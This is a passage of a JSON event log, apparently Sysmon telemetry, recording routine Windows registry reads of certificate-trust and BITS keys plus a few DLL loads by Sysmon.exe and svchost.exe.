"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wldp.dll", - "image_path": "C:\\Windows\\System32\\wldp.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877610000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "cryptbase.dll", - "image_path": "C:\\Windows\\System32\\cryptbase.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570878710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", - "registry_value": "BITS", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\BITS", - "registry_value": "BITS", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "FlightSettings.dll", - "image_path": "C:\\Windows\\System32\\FlightSettings.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877770000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 